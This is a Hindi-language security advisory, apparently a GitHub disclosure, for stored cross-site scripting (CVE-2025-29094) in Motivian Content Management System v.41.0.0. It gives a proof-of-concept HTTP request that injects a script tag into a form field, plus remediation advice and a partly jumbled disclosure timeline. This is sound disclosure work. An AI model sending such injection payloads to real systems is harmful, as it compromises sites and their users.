
यह रिपॉजिटरी Motivian Content Management System v.41.0.0 में पाई गई एक सुरक्षा कमजोरी का खुलासा करती है।
यह रिपॉजिटरी Motivian Content Management System v.41.0.0 में खोजी गई एक सुरक्षा कमजोरी को प्रकट करता है।
यह कमजोरी जिम्मेदार प्रकटीकरण प्रथाओं के अनुसार विक्रेता को, और MITRE को सूचित की गई, जिसने एक अस्थायी CVE ID निर्दिष्ट की। विवरण 45-दिवसीय प्रकटीकरण अवधि समाप्त होने के बाद सार्वजनिक किए जा रहे हैं।
Marketing/Forms, Marketing/Offers, Content/PagesMotivian Content Mangment System v.41.0.0 में क्रॉस-साइट स्क्रिप्टिंग कमजोरी एक दूरस्थ हमलावर को Marketing/Forms, Marketing/Offers और Content/Pages घटकों के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देती है। इस कमजोरी का शोषण विभिन्न फ़ील्ड्स में दुर्भावनापूर्ण JavaScript कोड इंजेक्ट करके किया गया, जिसमें Marketing/Form और Marketing/Offers में शीर्षक, और Content/Pages में header script फ़ील्ड शामिल हैं।
इस कमजोरी का शोषण विभिन्न घटकों में विभिन्न फ़ील्ड्स के माध्यम से किया जा सकता है। प्रदर्शन उद्देश्यों के लिए, निम्नलिखित प्रूफ-ऑफ-कॉन्सेप्ट एक विशिष्ट परिदृश्य पर केंद्रित है:
Marketing/Forms अनुभाग पर जाएं और एक नया फॉर्म तत्व बनाएं।समस्या को प्रदर्शित करने के लिए उपयोग किए गए HTTP अनुरोधों और प्रतिक्रियाओं का पूर्ण प्रतिलेख नीचे दिया गया है:
POST /portal/admin/formbuilder/editCmsFormProps!saveForm.action HTTP/1.1
Host: [REDACTED]
Content-Length: 1362
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close
targetFieldId=&targetFormId=&targetFieldIndex=&openedTabProps=tab1&langSelected=it&form.id=1162&search_form_id=&search_form_status_id=&search_form_name=&search_form_description=&date_from=&date_to=¤tPage=&struts.token.name=EditCmsFormProps&EditCmsFormProps=DBFW4RH1O9SVF1J3J9TA0WSD5VHPJCKY&date_notification=&form.seoName_en=&form.seoName_el=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&[...]
HTTP/1.1 200 OK
Connection: close
Date: Wed, 05 Feb 2025 12:00:09 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: it-IT
Content-Length: 94593
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>MOTIVIAN | Content Management</title> <link rel="shortcut icon" type="image/x-icon" href="/portal/favicon.ico"/> <link rel="icon" type="image/x-icon" href="/portal/favicon.ico"/> <script> <a href="javascript:void(0)" class="sortingRow" onclick="javascript:simplePagesFormDoSort('status','asc')" >Status</a></td> <td class="TableHeader" colspan="9" style="width:188px">Management</td> <td class="TableHeader w10"> </td> </tr> </table> </td> </tr> <tr> <td class="w10 row_odd"> </td> <td class="w70 row_odd"> <div class="check-box w70" style="float:left"> <input type="checkbox" id="subpages_formIds_id_1162" name="formIds" value="1162"> <label for="subpages_formIds_id_1162">1162 </label> </div> </td> <td class="w40 row_odd"><img src="https://raw.githubusercontent.com/framarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss/HEAD/portal/assets/images/red_form.png"/></td> <td class="NameCol row_odd"> <div class="wrap_words_within_rows w155"><script>alert(document.domain)</script> [...]
सभी उपयोगकर्ता इनपुट को स्वच्छ करें और रेंडर करने से पहले आउटपुट को एस्केप करें। XSS जोखिमों को कम करने के लिए CSP (Content Security Policy) हेडर लागू करें।
| Date | Action |
|---|---|
| 2025-02-06 | CVE ID अनुरोध (CNA: MITRE) |
| 2025-04-02 |
द्वारा खोजा गया और जिम्मेदारी से प्रकट किया गया:
Francesco Marcuccio
साइबरसुरक्षा सलाहकार, पेनिट्रेशन टेस्टर
MITRE खोजकर्ता श्रेय इस प्रकार सूचीबद्ध:
Francesco Marcuccio
साइबरसुरक्षा सलाहकार, पेनिट्रेशन टेस्टर
यह CVE ID आधिकारिक तौर पर PUBLISHED स्थिति में है। विश्लेषण के बाद NIST द्वारा CVSS स्कोर के साथ अपडेट किया जाएगा।
| CVE ID असाइनमेंट |
| 2025-04-07 | विक्रेता को कमजोरियों की सूचना |
| 2025-05-31 | 45-दिवसीय प्रकटीकरण अवधि समाप्त होने के बाद सार्वजनिक प्रकटीकरण (कुल 54 दिन) |
| 2025-06-04 | MITRE डेटाबेस और NIST/NVD पोर्टल में आधिकारिक पंजीकरण और प्रविष्टि |